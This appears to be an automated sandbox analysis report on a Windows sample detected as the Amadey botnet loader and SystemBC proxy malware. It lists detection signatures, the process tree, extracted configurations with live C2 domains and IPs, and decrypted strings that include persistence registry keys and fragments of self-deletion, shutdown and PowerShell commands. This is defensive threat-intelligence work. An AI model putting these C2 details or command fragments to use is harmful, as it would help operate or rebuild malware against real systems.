
Windows Analysis Report
Fp80Ocyhqm.exe

Overview

General Information

Sample name: Fp80Ocyhqm.exe (renamed because the original name is a hash value)
Original sample name: a9749ee52eefb0fd48a66527095354bb.exe
Analysis ID: 1631944
MD5: a9749ee52eefb0fd48a66527095354bb
SHA1: 78170bcc54e1f774528dea3118b50ffc46064fe0
SHA256: b1663d4497ddd27a59f090b72adcedddac51724a1c126f7d6469f8045d065e15
Tags: exe, user-abuse_ch

Detection

Amadey, SystemBC
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadey
Yara detected Amadey's Clipper DLL
Yara detected SystemBC
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Contains functionality to start a terminal service
Hides threads from debuggers
Joe Sandbox ML detected suspicious sample
PE file contains section with special chars
Sample uses string decryption to hide its real strings
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Abnormal high CPU Usage
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • Fp80Ocyhqm.exe (PID: 7468 cmdline: "C:\Users\user\Desktop\Fp80Ocyhqm.exe" MD5: A9749EE52EEFB0FD48A66527095354BB)
    • Gxtuum.exe (PID: 7524 cmdline: "C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe" MD5: A9749EE52EEFB0FD48A66527095354BB)
      • cubrodriver.exe (PID: 7764 cmdline: "C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe" MD5: 190272EBD2E82A80B242B1BDD442B859)
  • Gxtuum.exe (PID: 7592 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)
  • Gxtuum.exe (PID: 7680 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)
  • fvvb.exe (PID: 7904 cmdline: C:\ProgramData\giab\fvvb.exe MD5: 190272EBD2E82A80B242B1BDD442B859)
  • Gxtuum.exe (PID: 2740 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)
  • Gxtuum.exe (PID: 1868 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)
  • Gxtuum.exe (PID: 5108 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)
  • Gxtuum.exe (PID: 7880 cmdline: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe MD5: A9749EE52EEFB0FD48A66527095354BB)
  • cleanup
Name | Description | Attribution | Blogpost URLs | Link
Amadey | Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware. | No Attribution | (none) | https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name | Description | Attribution | Blogpost URLs | Link
SystemBC | SystemBC is a multiplatform proxy malware active since August 2019. It creates SOCKS5 network tunnels in the victim's network and connects to its C2 server using a custom, RC4-encrypted protocol. It can also download and execute additional malware, with payloads either written to disk or mapped into memory. The SystemBC kit, including the C2 panel, server, and malware executables, is sold in underground forums. | No Attribution | (none) | https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc
{"C2 url": "cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php", "Version": "5.21", "Install Folder": "a58456755d", "Install File": "Gxtuum.exe"}
{"HOST1": "towerbingobongoboom.com", "HOST2": "62.60.226.86"}
Source | Rule | Description | Author | Strings
Fp80Ocyhqm.exe | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | (none)

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | (none)

Source | Rule | Description | Author | Strings
00000006.00000003.1487197253.0000000004774000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | (none)
00000005.00000003.1433439906.0000000004774000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | (none)
Process Memory Space: cubrodriver.exe PID: 7764 | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | (none)
Process Memory Space: fvvb.exe PID: 7904 | JoeSecurity_SystemBC | Yara detected SystemBC | Joe Security | (none)
decrypted.memstr | JoeSecurity_Amadey_4 | Yara detected Amadey | Joe Security | (none)

Source | Rule | Description | Author | Strings
4.2.Gxtuum.exe.410000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | (none)
3.0.Gxtuum.exe.410000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | (none)
13.2.Gxtuum.exe.410000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | (none)
13.0.Gxtuum.exe.410000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | (none)
9.2.Gxtuum.exe.410000.0.unpack | JoeSecurity_Amadey_3 | Yara detected Amadey's Clipper DLL | Joe Security | (none)
(11 entries in the full report; the remaining entries are not shown here)
                          No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T17:36:58.549515+0100 | 2856147 | 1 | A Network Trojan was detected | 192.168.2.6 | 49688 | 107.189.27.66 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T17:37:00.686629+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49689 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:13.439694+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49693 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:17.878782+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49697 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:22.315599+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49699 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:26.719338+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49701 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:31.201875+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49703 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:35.660532+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49706 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:40.175519+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49709 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:44.655033+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49711 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:49.106611+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49713 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:53.566912+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49715 | 107.189.27.66 | 80 | TCP
2025-03-07T17:37:58.070062+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49717 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:02.587632+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49719 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:07.145462+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49722 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:11.583261+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49724 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:16.056143+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49726 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:20.579050+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49728 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:25.156858+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49730 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:29.716871+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49732 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:34.243492+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49734 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:38.693125+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49736 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:43.148845+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49738 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:47.674958+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49740 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:52.203997+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49742 | 107.189.27.66 | 80 | TCP
2025-03-07T17:38:56.689047+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49744 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:01.428911+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49746 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:06.905686+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49748 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:11.525191+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49750 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:15.928440+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49752 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:20.393256+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49754 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:24.854747+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49756 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:29.289247+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49758 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:33.681471+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49760 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:38.309309+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49762 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:42.792835+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49764 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:47.383982+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49766 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:52.102613+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49768 | 107.189.27.66 | 80 | TCP
2025-03-07T17:39:56.634897+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49770 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:01.479543+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49772 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:06.072505+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49774 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:10.498250+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49776 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:14.980314+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49778 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:19.371150+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49780 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:23.805945+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49782 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:28.226940+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49784 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:32.648627+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49786 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:37.108189+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49788 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:41.556710+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49790 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:45.946052+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49792 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:50.510586+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49794 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:54.953044+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49796 | 107.189.27.66 | 80 | TCP
2025-03-07T17:40:59.610016+0100 | 2856148 | 1 | A Network Trojan was detected | 192.168.2.6 | 49798 | 107.189.27.66 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-07T17:37:02.924068+0100 | 2803305 | 3 | Unknown Traffic | 192.168.2.6 | 49690 | 45.59.120.8 | 80 | TCP

                          AV Detection

Source: Fp80Ocyhqm.exe | Avira: detected
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpH | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpF | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpekjlfnvtgpegkwr.xyz5 | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpI | Avira URL Cloud: Label: malware
Source: towerbingobongoboom.com | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpheR | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpSA1 | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpqA_ | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpeK | Avira URL Cloud: Label: malware
Source: http://cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.phpekjlfnvtgpegkwr.xyz | Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Avira: detection malicious, Label: TR/AVI.Amadey.dzcps
Source: Fp80Ocyhqm.exe | Malware Configuration Extractor: Amadey {"C2 url": "cobolrationumelawrtewarms.com/3ofn3jf3e2ljk/index.php", "Version": "5.21", "Install Folder": "a58456755d", "Install File": "Gxtuum.exe"}
Source: 00000006.00000003.1487197253.0000000004774000.00000004.00001000.00020000.00000000.sdmp | Malware Configuration Extractor: SystemBC {"HOST1": "towerbingobongoboom.com", "HOST2": "62.60.226.86"}
Source: C:\ProgramData\giab\fvvb.exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\cubrodriver[1].exe | ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | ReversingLabs: Detection: 81%
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe | ReversingLabs: Detection: 44%
Source: Fp80Ocyhqm.exe | Virustotal: Detection: 79%
Source: Fp80Ocyhqm.exe | ReversingLabs: Detection: 81%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: cobolrationumelawrtewarms.com
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: /3ofn3jf3e2ljk/index.php
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: S-%lu-
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: a58456755d
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Gxtuum.exe
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Startup
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: cmd /C RMDIR /s/q
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: rundll32
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Programs
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: %USERPROFILE%
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: cred.dll|clip.dll|
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: cred.dll
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: clip.dll
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: http://
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: https://
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: /quiet
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: /Plugins/
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: &unit=
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: shell32.dll
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: kernel32.dll
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: GetNativeSystemInfo
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: ProgramData\
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: AVAST Software
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Kaspersky Lab
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Panda Security
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Doctor Web
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: 360TotalSecurity
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Bitdefender
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Norton
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Sophos
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Comodo
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: WinDefender
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: 0123456789
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Content-Type: multipart/form-data; boundary=----
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: ------
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: ?scr=1
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Content-Type: application/x-www-form-urlencoded
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: SYSTEM\CurrentControlSet\Control\ComputerName\ComputerName
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: ComputerName
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: abcdefghijklmnopqrstuvwxyz0123456789-_
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: -unicode-
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: SYSTEM\CurrentControlSet\Control\UnitedVideo\CONTROL\VIDEO\
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: SYSTEM\ControlSet001\Services\BasicDisplay\Video
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: VideoID
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: DefaultSettings.XResolution
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: DefaultSettings.YResolution
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: SOFTWARE\Microsoft\Windows NT\CurrentVersion
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: ProductName
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: CurrentBuild
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: rundll32.exe
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: "taskkill /f /im "
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: " && timeout 1 && del
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: && Exit"
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: " && ren
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Powershell.exe
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: -executionpolicy remotesigned -File "
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: shutdown -s -t 0
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: random
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: Keyboard Layout\Preload
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: 00000419
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: 00000422
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: 00000423
Source: 0000000D.00000000.3161119501.0000000000461000.00000002.00000001.01000000.00000008.sdmp | String decryptor: 0000043f
Source: Fp80Ocyhqm.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Fp80Ocyhqm.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: C:\Users\user\Desktop\Fp80Ocyhqm.exe | Code function: 0_2_0009F011 FindFirstFileExW, 0_2_0009F011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 1_2_0044F011 FindFirstFileExW, 1_2_0044F011
Source: C:\Users\user\AppData\Local\Temp\a58456755d\Gxtuum.exe | Code function: 3_2_0044F011 FindFirstFileExW, 3_2_0044F011

                          Networking

Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49689 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.6:49688 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49697 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49699 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49693 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49703 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49706 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49717 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49713 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49711 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49719 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49715 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49730 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49732 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49722 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49728 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49724 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49742 -> 107.189.27.66:80
Source: Network traffic | Suricata IDS: 2856148 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M4 : 192.168.2.6:49770 -> 107.189.27.66:80
